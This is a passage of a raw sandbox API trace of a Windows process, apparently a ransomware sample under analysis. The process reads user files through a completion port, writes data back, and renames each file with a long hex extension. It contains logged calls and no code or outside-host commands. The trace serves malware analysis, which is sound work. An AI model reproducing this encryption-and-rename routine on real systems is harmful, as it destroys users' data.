CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0114.189] ReadFile (in: hFile=0x338, lpBuffer=0x3338588, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3318450 | out: lpBuffer=0x3338588*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3318450) returned 1 [0114.189] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0114.191] NtQueryObject (in: Handle=0x338, ObjectInformationClass=0x1, ObjectInformation=0x3318500, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x3318500, ReturnLength=0x28fff70) returned 0x0 [0114.191] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install_2021-02-11_125336_460-898.log", lpString2=".D60DA26D1B1A066021BBC02BEA9329FE3CA99D545FB12360AE377C861D9FEB08" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install_2021-02-11_125336_460-898.log.D60DA26D1B1A066021BBC02BEA9329FE3CA99D545FB12360AE377C861D9FEB08") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install_2021-02-11_125336_460-898.log.D60DA26D1B1A066021BBC02BEA9329FE3CA99D545FB12360AE377C861D9FEB08" [0114.191] GetProcessHeap () returned 0x600000 [0114.191] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x18c) returned 0x3160338 [0114.191] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x28fff60, FileInformation=0x3160338, Length=0x18c, FileInformationClass=0xa) returned 0x0 [0114.192] CloseHandle (hObject=0x338) returned 1 [0114.193] GetProcessHeap () returned 0x600000 [0114.193] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3318450 | out: hHeap=0x600000) returned 1 [0114.197] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0114.202] ReadFile (in: hFile=0x338, lpBuffer=0x680470, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x660338 | out: lpBuffer=0x680470*, lpNumberOfBytesRead=0x0, lpOverlapped=0x660338) returned 1 [0114.202] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0114.203] NtQueryObject (in: Handle=0x338, ObjectInformationClass=0x1, ObjectInformation=0x6603e8, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x6603e8, ReturnLength=0x28fff70) returned 0x0 [0114.204] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install_2021-02-11_131858_ed0-ed4.log", lpString2=".FFB2A0BC3537947D0C940976E5E412A5DFC1C5E4E3D2BEBE417FD3F0737AD53D" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install_2021-02-11_131858_ed0-ed4.log.FFB2A0BC3537947D0C940976E5E412A5DFC1C5E4E3D2BEBE417FD3F0737AD53D") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install_2021-02-11_131858_ed0-ed4.log.FFB2A0BC3537947D0C940976E5E412A5DFC1C5E4E3D2BEBE417FD3F0737AD53D" [0114.204] GetProcessHeap () returned 0x600000 [0114.204] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x18c) returned 0x31604d0 [0114.204] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x28fff60, FileInformation=0x31604d0, Length=0x18c, FileInformationClass=0xa) returned 0x0 [0114.205] CloseHandle (hObject=0x338) returned 1 [0114.205] GetProcessHeap () returned 0x600000 [0114.205] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x660338 | out: hHeap=0x600000) returned 1 [0114.206] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0114.211] ReadFile (in: hFile=0x338, lpBuffer=0x680470, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x660338 | out: lpBuffer=0x680470*, lpNumberOfBytesRead=0x0, lpOverlapped=0x660338) returned 1 [0114.211] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0114.212] NtQueryObject (in: Handle=0x338, ObjectInformationClass=0x1, ObjectInformation=0x6603e8, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x6603e8, ReturnLength=0x28fff70) returned 0x0 [0114.212] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install_2021-02-11_132412_e10-e14.log", lpString2=".04DC103F72ED2102BB6FB7833B31E411790FFC25C7618D0366A218282BE8F132" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install_2021-02-11_132412_e10-e14.log.04DC103F72ED2102BB6FB7833B31E411790FFC25C7618D0366A218282BE8F132") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install_2021-02-11_132412_e10-e14.log.04DC103F72ED2102BB6FB7833B31E411790FFC25C7618D0366A218282BE8F132" [0114.212] GetProcessHeap () returned 0x600000 [0114.212] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x18c) returned 0x3160668 [0114.212] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x28fff60, FileInformation=0x3160668, Length=0x18c, FileInformationClass=0xa) returned 0x0 [0114.213] CloseHandle (hObject=0x338) returned 1 [0114.214] GetProcessHeap () returned 0x600000 [0114.214] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x660338 | out: hHeap=0x600000) returned 1 [0114.214] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0114.216] ReadFile (in: hFile=0x338, lpBuffer=0x680470, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x660338 | out: lpBuffer=0x680470*, lpNumberOfBytesRead=0x0, lpOverlapped=0x660338) returned 1 [0114.216] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0114.217] WriteFile (in: hFile=0x338, lpBuffer=0x680470*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x660338 | out: lpBuffer=0x680470*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x660338) returned 1 [0114.218] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0114.218] NtQueryObject (in: Handle=0x338, ObjectInformationClass=0x1, ObjectInformation=0x6603e8, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x6603e8, ReturnLength=0x28fff70) returned 0x0 [0114.219] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install_2021-02-11_132742_c8c-c90.log", lpString2=".486F02AE97C74170D7E738D7BDCED4469301CA343177A0ABD1DCECECC2D80B58" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install_2021-02-11_132742_c8c-c90.log.486F02AE97C74170D7E738D7BDCED4469301CA343177A0ABD1DCECECC2D80B58") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install_2021-02-11_132742_c8c-c90.log.486F02AE97C74170D7E738D7BDCED4469301CA343177A0ABD1DCECECC2D80B58" [0114.219] GetProcessHeap () returned 0x600000 [0114.219] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x18c) returned 0x3160800 [0114.219] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x28fff60, FileInformation=0x3160800, Length=0x18c, FileInformationClass=0xa) returned 0x0 [0114.219] CloseHandle (hObject=0x338) returned 1 [0114.220] GetProcessHeap () returned 0x600000 [0114.220] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x660338 | out: hHeap=0x600000) returned 1 [0114.221] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0114.224] ReadFile (in: hFile=0x32c, lpBuffer=0x6a85c8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x688490 | out: lpBuffer=0x6a85c8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x688490) returned 1 [0114.224] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0114.225] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x688540, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x688540, ReturnLength=0x28fff70) returned 0x0 [0114.225] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install_2021-02-11_134547_2bc-868.log", lpString2=".64B2B33BCF7F0D1053D3A8C9A98449B23E0A78D97D13967262936A9B6EE89D75" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install_2021-02-11_134547_2bc-868.log.64B2B33BCF7F0D1053D3A8C9A98449B23E0A78D97D13967262936A9B6EE89D75") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install_2021-02-11_134547_2bc-868.log.64B2B33BCF7F0D1053D3A8C9A98449B23E0A78D97D13967262936A9B6EE89D75" [0114.225] GetProcessHeap () returned 0x600000 [0114.225] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x18c) returned 0x3160998 [0114.226] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x28fff60, FileInformation=0x3160998, Length=0x18c, FileInformationClass=0xa) returned 0x0 [0114.229] CloseHandle (hObject=0x32c) returned 1 [0114.229] GetProcessHeap () returned 0x600000 [0114.229] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x688490 | out: hHeap=0x600000) returned 1 [0114.231] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0114.394] ReadFile (in: hFile=0x32c, lpBuffer=0x680470, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x0, lpOverlapped=0x660338 | out: lpBuffer=0x680470*, lpNumberOfBytesRead=0x0, lpOverlapped=0x660338) returned 1 [0114.394] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0114.394] WriteFile (in: hFile=0x324, lpBuffer=0x31130f8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0) returned 1 [0114.399] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0114.818] NtQueryObject (in: Handle=0x214, ObjectInformationClass=0x1, ObjectInformation=0x6603e8, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x6603e8, ReturnLength=0x28fff70) returned 0x0 [0114.819] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\Microsoft.AccountsControl_10.0.10586.0_neutral__cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat", lpString2=".50ACEF19BC0065A26172023D398F9868C6AE7BFD61D3C3A0B8EAAC51425B5C44" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\Microsoft.AccountsControl_10.0.10586.0_neutral__cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat.50ACEF19BC0065A26172023D398F9868C6AE7BFD61D3C3A0B8EAAC51425B5C44") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\Microsoft.AccountsControl_10.0.10586.0_neutral__cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat.50ACEF19BC0065A26172023D398F9868C6AE7BFD61D3C3A0B8EAAC51425B5C44" [0114.819] GetProcessHeap () returned 0x600000 [0114.819] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x22a) returned 0x635760 [0114.819] NtSetInformationFile (FileHandle=0x214, IoStatusBlock=0x28fff60, FileInformation=0x635760, Length=0x22a, FileInformationClass=0xa) returned 0x0 [0114.821] CloseHandle (hObject=0x214) returned 1 [0114.821] GetProcessHeap () returned 0x600000 [0114.821] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x660338 | out: hHeap=0x600000) returned 1 [0114.823] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0115.280] WriteFile (in: hFile=0x32c, lpBuffer=0x690478*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 1 [0115.286] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0115.403] WriteFile (in: hFile=0x32c, lpBuffer=0x690478*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 1 [0115.404] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0115.486] WriteFile (in: hFile=0x324, lpBuffer=0x31130f8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0) returned 1 [0115.488] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0115.491] NtQueryObject (in: Handle=0x324, ObjectInformationClass=0x1, ObjectInformation=0x30f3070, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x30f3070, ReturnLength=0x28fff70) returned 0x0 [0115.491] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\Settings\\settings.dat", lpString2=".3D503CFD5EE4FB581CD2D4DCE7619EEDDEF3BC930C207B4F934DC2E87C6E3A47" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\Settings\\settings.dat.3D503CFD5EE4FB581CD2D4DCE7619EEDDEF3BC930C207B4F934DC2E87C6E3A47") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\Settings\\settings.dat.3D503CFD5EE4FB581CD2D4DCE7619EEDDEF3BC930C207B4F934DC2E87C6E3A47" [0115.491] GetProcessHeap () returned 0x600000 [0115.491] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x18a) returned 0x6b3130 [0115.492] NtSetInformationFile (FileHandle=0x324, IoStatusBlock=0x28fff60, FileInformation=0x6b3130, Length=0x18a, FileInformationClass=0xa) returned 0x0 [0115.498] CloseHandle (hObject=0x324) returned 1 [0115.498] GetProcessHeap () returned 0x600000 [0115.498] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0115.499] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0115.562] WriteFile (in: hFile=0x214, lpBuffer=0x690478*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 1 [0115.566] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0115.701] WriteFile (in: hFile=0x32c, lpBuffer=0x31130f8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0) returned 1 [0115.704] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0115.812] WriteFile (in: hFile=0x324, lpBuffer=0x690478*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 1 [0115.818] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0116.371] WriteFile (in: hFile=0x318, lpBuffer=0x32c0180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x32a0048 | out: lpBuffer=0x32c0180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x32a0048) returned 1 [0116.372] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0116.372] NtQueryObject (in: Handle=0x318, ObjectInformationClass=0x1, ObjectInformation=0x32a00f8, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x32a00f8, ReturnLength=0x28fff70) returned 0x0 [0116.372] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Data\\nouser1\\120712-0049\\DBStore\\LogFiles\\edb.log", lpString2=".84C9758EF5248F33D5A8B602DF3BAAE8CB9DB6313F07FB88A5AB06777DB3683F" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Data\\nouser1\\120712-0049\\DBStore\\LogFiles\\edb.log.84C9758EF5248F33D5A8B602DF3BAAE8CB9DB6313F07FB88A5AB06777DB3683F") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Data\\nouser1\\120712-0049\\DBStore\\LogFiles\\edb.log.84C9758EF5248F33D5A8B602DF3BAAE8CB9DB6313F07FB88A5AB06777DB3683F" [0116.372] GetProcessHeap () returned 0x600000 [0116.372] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x216) returned 0x63ed90 [0116.372] NtSetInformationFile (FileHandle=0x318, IoStatusBlock=0x28fff60, FileInformation=0x63ed90, Length=0x216, FileInformationClass=0xa) returned 0x0 [0116.373] CloseHandle (hObject=0x318) returned 1 [0116.374] GetProcessHeap () returned 0x600000 [0116.374] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x32a0048 | out: hHeap=0x600000) returned 1 [0116.375] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0116.379] ReadFile (in: hFile=0x318, lpBuffer=0x32c0180, nNumberOfBytesToRead=0x1400, lpNumberOfBytesRead=0x0, lpOverlapped=0x32a0048 | out: lpBuffer=0x32c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x32a0048) returned 1 [0116.380] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0116.385] WriteFile (in: hFile=0x318, lpBuffer=0x32c0180*, nNumberOfBytesToWrite=0x1200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x32a0048 | out: lpBuffer=0x32c0180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x32a0048) returned 1 [0116.386] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0116.386] NtQueryObject (in: Handle=0x318, ObjectInformationClass=0x1, ObjectInformation=0x32a00f8, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x32a00f8, ReturnLength=0x28fff70) returned 0x0 [0116.387] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\Recovery\\Active\\{44F17EFB-7053-11EB-B0AC-0050F0B0FFDB}.dat", lpString2=".54E4FC6415D6510B1D52DF5052C8EBE849E344CA8AB18D8ECBEF16EC76459A06" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\Recovery\\Active\\{44F17EFB-7053-11EB-B0AC-0050F0B0FFDB}.dat.54E4FC6415D6510B1D52DF5052C8EBE849E344CA8AB18D8ECBEF16EC76459A06") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\Recovery\\Active\\{44F17EFB-7053-11EB-B0AC-0050F0B0FFDB}.dat.54E4FC6415D6510B1D52DF5052C8EBE849E344CA8AB18D8ECBEF16EC76459A06" [0116.387] GetProcessHeap () returned 0x600000 [0116.387] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x214) returned 0x63f630 [0116.387] NtSetInformationFile (FileHandle=0x318, IoStatusBlock=0x28fff60, FileInformation=0x63f630, Length=0x214, FileInformationClass=0xa) returned 0x0 [0116.388] CloseHandle (hObject=0x318) returned 1 [0116.388] GetProcessHeap () returned 0x600000 [0116.388] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x32a0048 | out: hHeap=0x600000) returned 1 [0116.388] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0116.449] ReadFile (in: hFile=0x31c, lpBuffer=0x690478, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0116.449] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, 